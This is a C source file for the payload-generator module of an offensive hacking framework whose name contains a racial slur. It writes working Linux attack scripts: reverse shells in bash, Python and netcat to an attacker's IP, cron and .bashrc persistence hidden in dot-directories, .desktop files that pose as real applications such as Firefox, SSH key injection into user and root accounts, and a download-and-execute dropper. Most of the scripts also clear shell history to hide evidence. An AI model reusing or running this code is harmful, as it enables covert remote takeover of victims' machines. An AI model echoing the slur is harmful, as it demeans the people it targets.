/*
 * ═══════════════════════════════════════════════════════════════════════
 *  ZAWARUDO MODULE - NIGGERSON FRAMEWORK
 *  Linux Payload Generator
 *  - Bash Reverse Shells
 *  - Cron Persistence
 *  - .desktop Hijacking
 *  - SSH Key Injection
 * ═══════════════════════════════════════════════════════════════════════
 */

// Headers included via main.c (unity build)
#include <time.h>
#include <sys/stat.h>

// ─── HELP ───────────────────────────────────────────────────────────────
void zawarudo_help(void) {
    printf("\n");
    printf(COLOR_MAGENTA "╔══════════════════════════════════════╗\n");
    printf("║   ZAWARUDO - PAYLOAD GENERATOR       ║\n");
    printf("╚══════════════════════════════════════╝" COLOR_RESET "\n\n");
    
    printf(COLOR_YELLOW "USAGE:" COLOR_RESET "\n");
    printf("  zawarudo create -type <TYPE> [options]\n\n");
    
    printf(COLOR_YELLOW "PAYLOAD TYPES:" COLOR_RESET "\n\n");
    
    printf(COLOR_CYAN "  reverse" COLOR_RESET " - Bash Reverse Shell\n");
    printf("    -ip <IP>     Attacker IP to connect back to\n");
    printf("    -port <PORT> Attacker listening port\n");
    printf("    Example: zawarudo create -type reverse -ip 192.168.1.100 -port 4444\n\n");
    
    printf(COLOR_CYAN "  cron" COLOR_RESET " - Cron Persistence\n");
    printf("    -ip <IP>     Attacker IP for callback\n");
    printf("    -port <PORT> Attacker port\n");
    printf("    -interval <MIN> Callback interval in minutes (default: 5)\n");
    printf("    Example: zawarudo create -type cron -ip 192.168.1.100 -port 4444\n\n");
    
    printf(COLOR_CYAN "  desktop" COLOR_RESET " - .desktop File Payload\n");
    printf("    -name <NAME> Application name to impersonate\n");
    printf("    -cmd <CMD>   Hidden command to run\n");
    printf("    Example: zawarudo create -type desktop -name Firefox -cmd 'bash -i >& /dev/tcp/IP/PORT 0>&1'\n\n");
    
    printf(COLOR_CYAN "  ssh" COLOR_RESET " - SSH Key Injector Script\n");
    printf("    -key <PUBKEY> Your SSH public key\n");
    printf("    Example: zawarudo create -type ssh -key 'ssh-rsa AAAA... user@host'\n\n");
    
    printf(COLOR_CYAN "  dropper" COLOR_RESET " - Download & Execute Script\n");
    printf("    -url <URL>   URL of payload to download\n");
    printf("    Example: zawarudo create -type dropper -url http://evil.com/payload.sh\n\n");
    
    printf(COLOR_YELLOW "OUTPUT:" COLOR_RESET "\n");
    printf("  Payloads are saved to: ./payloads/\n\n");
}

// ─── GENERATE REVERSE SHELL ─────────────────────────────────────────────
static void create_reverse_shell(const char* ip, int port) {
    printf(COLOR_CYAN "[*] Generating bash reverse shell..." COLOR_RESET "\n");
    
    // Create payloads directory
    mkdir("payloads", 0755);
    
    char filename[128];
    snprintf(filename, sizeof(filename), "payloads/reverse_%d.sh", (int)time(NULL));
    
    FILE* fp = fopen(filename, "w");
    if (!fp) {
        printf(COLOR_RED "[!] Failed to create payload file!" COLOR_RESET "\n");
        return;
    }
    
    fprintf(fp, "#!/bin/bash\n");
    fprintf(fp, "# Reverse Shell Payload - Generated by ZAWARUDO\n");
    fprintf(fp, "# Target this at: %s:%d\n\n", ip, port);
    
    // Multiple reverse shell methods for reliability
    fprintf(fp, "# Method 1: Bash TCP\n");
    fprintf(fp, "bash -i >& /dev/tcp/%s/%d 0>&1 2>/dev/null &\n\n", ip, port);
    
    fprintf(fp, "# Method 2: Python (fallback)\n");
    fprintf(fp, "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"%s\",%d));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])' 2>/dev/null &\n\n", ip, port);
    
    fprintf(fp, "# Method 3: Netcat with -e\n");
    fprintf(fp, "nc -e /bin/bash %s %d 2>/dev/null &\n\n", ip, port);
    
    fprintf(fp, "# Method 4: Netcat without -e (named pipe)\n");
    fprintf(fp, "rm -f /tmp/.p; mkfifo /tmp/.p; cat /tmp/.p | /bin/bash -i 2>&1 | nc %s %d > /tmp/.p &\n\n", ip, port);
    
    fprintf(fp, "# Silent cleanup\n");
    fprintf(fp, "history -c 2>/dev/null\n");
    
    fclose(fp);
    chmod(filename, 0755);
    
    printf(COLOR_GREEN "[+] Payload saved: %s" COLOR_RESET "\n", filename);
    printf(COLOR_YELLOW "[*] Listen with: nc -lvnp %d" COLOR_RESET "\n\n", port);
    
    // Also print one-liner
    printf(COLOR_CYAN "[*] Quick one-liner:" COLOR_RESET "\n");
    printf("bash -i >& /dev/tcp/%s/%d 0>&1\n\n", ip, port);
}

// ─── GENERATE CRON PERSISTENCE ──────────────────────────────────────────
static void create_cron_persistence(const char* ip, int port, int interval) {
    printf(COLOR_CYAN "[*] Generating cron persistence script..." COLOR_RESET "\n");
    
    mkdir("payloads", 0755);
    
    char filename[128];
    snprintf(filename, sizeof(filename), "payloads/cron_%d.sh", (int)time(NULL));
    
    FILE* fp = fopen(filename, "w");
    if (!fp) {
        printf(COLOR_RED "[!] Failed to create payload file!" COLOR_RESET "\n");
        return;
    }
    
    fprintf(fp, "#!/bin/bash\n");
    fprintf(fp, "# Cron Persistence - Generated by ZAWARUDO\n\n");
    
    fprintf(fp, "# Create hidden reverse shell script\n");
    fprintf(fp, "mkdir -p ~/.config/.cache 2>/dev/null\n");
    fprintf(fp, "cat > ~/.config/.cache/.update << 'EOF'\n");
    fprintf(fp, "#!/bin/bash\n");
    fprintf(fp, "bash -i >& /dev/tcp/%s/%d 0>&1\n", ip, port);
    fprintf(fp, "EOF\n");
    fprintf(fp, "chmod +x ~/.config/.cache/.update\n\n");
    
    fprintf(fp, "# Add to crontab (runs every %d minutes)\n", interval);
    fprintf(fp, "(crontab -l 2>/dev/null | grep -v '.update'; echo '*/%d * * * * ~/.config/.cache/.update') | crontab -\n\n", interval);
    
    fprintf(fp, "# Also add to profile for login persistence\n");
    fprintf(fp, "echo 'nohup ~/.config/.cache/.update &>/dev/null &' >> ~/.bashrc 2>/dev/null\n\n");
    
    fprintf(fp, "# Cleanup evidence\n");
    fprintf(fp, "history -c\n");
    
    fclose(fp);
    chmod(filename, 0755);
    
    printf(COLOR_GREEN "[+] Payload saved: %s" COLOR_RESET "\n", filename);
    printf(COLOR_YELLOW "[*] Callback every %d minutes to %s:%d" COLOR_RESET "\n\n", interval, ip, port);
}

// ─── GENERATE DESKTOP FILE ──────────────────────────────────────────────
static void create_desktop_payload(const char* name, const char* cmd) {
    printf(COLOR_CYAN "[*] Generating .desktop payload..." COLOR_RESET "\n");
    
    mkdir("payloads", 0755);
    
    char filename[128];
    snprintf(filename, sizeof(filename), "payloads/%s.desktop", name);
    
    FILE* fp = fopen(filename, "w");
    if (!fp) {
        printf(COLOR_RED "[!] Failed to create payload file!" COLOR_RESET "\n");
        return;
    }
    
    fprintf(fp, "[Desktop Entry]\n");
    fprintf(fp, "Name=%s\n", name);
    fprintf(fp, "Comment=Launch %s\n", name);
    fprintf(fp, "Exec=bash -c '%s; %s' %%U\n", cmd, name); // Run cmd then real app
    fprintf(fp, "Icon=%s\n", name);
    fprintf(fp, "Terminal=false\n");
    fprintf(fp, "Type=Application\n");
    fprintf(fp, "Categories=Application;\n");
    
    fclose(fp);
    chmod(filename, 0755);
    
    printf(COLOR_GREEN "[+] Payload saved: %s" COLOR_RESET "\n", filename);
    printf(COLOR_YELLOW "[*] Place in ~/.local/share/applications/ to override system apps" COLOR_RESET "\n\n");
}

// ─── GENERATE SSH KEY INJECTOR ──────────────────────────────────────────
static void create_ssh_injector(const char* pubkey) {
    printf(COLOR_CYAN "[*] Generating SSH key injector..." COLOR_RESET "\n");
    
    mkdir("payloads", 0755);
    
    char filename[128];
    snprintf(filename, sizeof(filename), "payloads/ssh_inject_%d.sh", (int)time(NULL));
    
    FILE* fp = fopen(filename, "w");
    if (!fp) {
        printf(COLOR_RED "[!] Failed to create payload file!" COLOR_RESET "\n");
        return;
    }
    
    fprintf(fp, "#!/bin/bash\n");
    fprintf(fp, "# SSH Key Injector - Generated by ZAWARUDO\n\n");
    
    fprintf(fp, "# Create .ssh if needed\n");
    fprintf(fp, "mkdir -p ~/.ssh\n");
    fprintf(fp, "chmod 700 ~/.ssh\n\n");
    
    fprintf(fp, "# Add attacker's key\n");
    fprintf(fp, "echo '%s' >> ~/.ssh/authorized_keys\n", pubkey);
    fprintf(fp, "chmod 600 ~/.ssh/authorized_keys\n\n");
    
    fprintf(fp, "# Try to add to root too (if we can)\n");
    fprintf(fp, "sudo mkdir -p /root/.ssh 2>/dev/null\n");
    fprintf(fp, "echo '%s' | sudo tee -a /root/.ssh/authorized_keys >/dev/null 2>&1\n\n", pubkey);
    
    fprintf(fp, "echo 'SSH key added successfully'\n");
    
    fclose(fp);
    chmod(filename, 0755);
    
    printf(COLOR_GREEN "[+] Payload saved: %s" COLOR_RESET "\n\n", filename);
}

// ─── GENERATE DROPPER ───────────────────────────────────────────────────
static void create_dropper(const char* url) {
    printf(COLOR_CYAN "[*] Generating download & execute dropper..." COLOR_RESET "\n");
    
    mkdir("payloads", 0755);
    
    char filename[128];
    snprintf(filename, sizeof(filename), "payloads/dropper_%d.sh", (int)time(NULL));
    
    FILE* fp = fopen(filename, "w");
    if (!fp) {
        printf(COLOR_RED "[!] Failed to create payload file!" COLOR_RESET "\n");
        return;
    }
    
    fprintf(fp, "#!/bin/bash\n");
    fprintf(fp, "# Dropper - Generated by ZAWARUDO\n\n");
    
    fprintf(fp, "# Try multiple download methods\n");
    fprintf(fp, "TMP=/tmp/.$(date +%%s)\n\n");
    
    fprintf(fp, "# Method 1: curl\n");
    fprintf(fp, "curl -fsSL '%s' -o $TMP 2>/dev/null && chmod +x $TMP && $TMP && rm -f $TMP && exit 0\n\n", url);
    
    fprintf(fp, "# Method 2: wget\n");
    fprintf(fp, "wget -q '%s' -O $TMP 2>/dev/null && chmod +x $TMP && $TMP && rm -f $TMP && exit 0\n\n", url);
    
    fprintf(fp, "# Method 3: Python\n");
    fprintf(fp, "python3 -c \"import urllib.request; urllib.request.urlretrieve('%s', '$TMP')\" 2>/dev/null && chmod +x $TMP && $TMP && rm -f $TMP\n", url);
    
    fclose(fp);
    chmod(filename, 0755);
    
    printf(COLOR_GREEN "[+] Payload saved: %s" COLOR_RESET "\n", filename);
    printf(COLOR_YELLOW "[*] One-liner: curl -fsSL %s | bash" COLOR_RESET "\n\n", url);
}

// ─── MAIN CREATE FUNCTION ───────────────────────────────────────────────
void zawarudo_create(const char* args) {
    if (!args || strlen(args) == 0) {
        zawarudo_help();
        return;
    }
    
    printf("\n");
    printf(COLOR_MAGENTA "╔══════════════════════════════════════╗\n");
    printf("║   ZAWARUDO - GENERATING PAYLOAD      ║\n");
    printf("╚══════════════════════════════════════╝" COLOR_RESET "\n\n");
    
    // Parse arguments
    char type[32] = "";
    char ip[64] = "";
    int port = 4444;
    int interval = 5;
    char name[64] = "";
    char cmd[256] = "";
    char key[512] = "";
    char url[256] = "";
    
    // Skip leading spaces
    while (*args == ' ') args++;
    
    // Simple argument parsing
    const char* p = args;
    while (*p) {
        if (strncmp(p, "-type ", 6) == 0) {
            sscanf(p + 6, "%31s", type);
        }
        else if (strncmp(p, "-ip ", 4) == 0) {
            sscanf(p + 4, "%63s", ip);
        }
        else if (strncmp(p, "-port ", 6) == 0) {
            sscanf(p + 6, "%d", &port);
        }
        else if (strncmp(p, "-interval ", 10) == 0) {
            sscanf(p + 10, "%d", &interval);
        }
        else if (strncmp(p, "-name ", 6) == 0) {
            sscanf(p + 6, "%63s", name);
        }
        else if (strncmp(p, "-cmd ", 5) == 0) {
            // Get everything after -cmd until next -
            const char* start = p + 5;
            while (*start == ' ' || *start == '\'') start++;
            int i = 0;
            while (start[i] && start[i] != '\'' && i < 255) {
                cmd[i] = start[i];
                i++;
            }
            cmd[i] = '\0';
        }
        else if (strncmp(p, "-key ", 5) == 0) {
            const char* start = p + 5;
            while (*start == ' ' || *start == '\'') start++;
            int i = 0;
            while (start[i] && start[i] != '\'' && i < 511) {
                key[i] = start[i];
                i++;
            }
            key[i] = '\0';
        }
        else if (strncmp(p, "-url ", 5) == 0) {
            sscanf(p + 5, "%255s", url);
        }
        p++;
    }
    
    // Generate based on type
    if (strcmp(type, "reverse") == 0) {
        if (strlen(ip) == 0) {
            printf(COLOR_RED "[!] Missing -ip parameter!" COLOR_RESET "\n\n");
            return;
        }
        create_reverse_shell(ip, port);
    }
    else if (strcmp(type, "cron") == 0) {
        if (strlen(ip) == 0) {
            printf(COLOR_RED "[!] Missing -ip parameter!" COLOR_RESET "\n\n");
            return;
        }
        create_cron_persistence(ip, port, interval);
    }
    else if (strcmp(type, "desktop") == 0) {
        if (strlen(name) == 0 || strlen(cmd) == 0) {
            printf(COLOR_RED "[!] Missing -name or -cmd parameter!" COLOR_RESET "\n\n");
            return;
        }
        create_desktop_payload(name, cmd);
    }
    else if (strcmp(type, "ssh") == 0) {
        if (strlen(key) == 0) {
            printf(COLOR_RED "[!] Missing -key parameter!" COLOR_RESET "\n\n");
            return;
        }
        create_ssh_injector(key);
    }
    else if (strcmp(type, "dropper") == 0) {
        if (strlen(url) == 0) {
            printf(COLOR_RED "[!] Missing -url parameter!" COLOR_RESET "\n\n");
            return;
        }
        create_dropper(url);
    }
    else {
        printf(COLOR_RED "[!] Unknown type: %s" COLOR_RESET "\n", type);
        printf(COLOR_YELLOW "[*] Valid types: reverse, cron, desktop, ssh, dropper" COLOR_RESET "\n\n");
    }
}
